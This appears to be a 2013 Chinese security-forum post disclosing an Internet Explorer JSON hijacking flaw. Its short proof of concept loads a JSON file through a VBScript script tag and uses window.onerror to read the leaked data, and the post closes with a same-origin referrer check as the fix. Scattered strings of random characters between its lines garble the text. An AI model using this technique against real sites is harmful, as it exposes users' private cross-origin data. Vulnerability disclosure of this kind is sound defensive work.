中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
# M5 Z( ~$ q/ q4 }" I
; c8 I5 A- Y; e4 i
由于某些资源容器对数据处理不当导致json劫持漏洞.
; C& U7 `9 G/ B% Z. ^& m1 S& s
详细说明:
4 @( j! |+ }' m( G" e6 i* `
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
1 G+ M( T# M& k$ q Q' T
<script language=vbscript></script>
3 a3 M1 y* T3 j0 R9 R* i
2 o& z9 C& P) V6 |; l' H% ~
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
$ K" D* x/ m7 _+ ?! F$ Y
漏洞证明:
0 Q! m: ^/ \4 ]6 T2 v* [
<script>
7 \1 u" z9 r! z8 _, ^
window.onerror=function(_){
# J0 ~3 a1 R3 p* }. n. V
alert(_)
& z! `4 l/ Y9 i/ N
}
( r( i" X0 D7 ~9 W2 W
</script>
* M" t/ J3 ]; \( K" ^3 j
<script language=vbscript src=1.json></script>
3 d: a6 ~. o' D3 G9 n/ i( b( P' r$ S' W
! s8 _7 q" o/ i5 ?+ ]. l
) c u9 [4 n* C9 `; a& W" b( _
1.json:
5 j8 F, [$ T' v0 O
[{"name":"sogili","age":19}]
- d- m+ k p! k
修复方案:
3 T! }1 u* h, h, P2 B
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2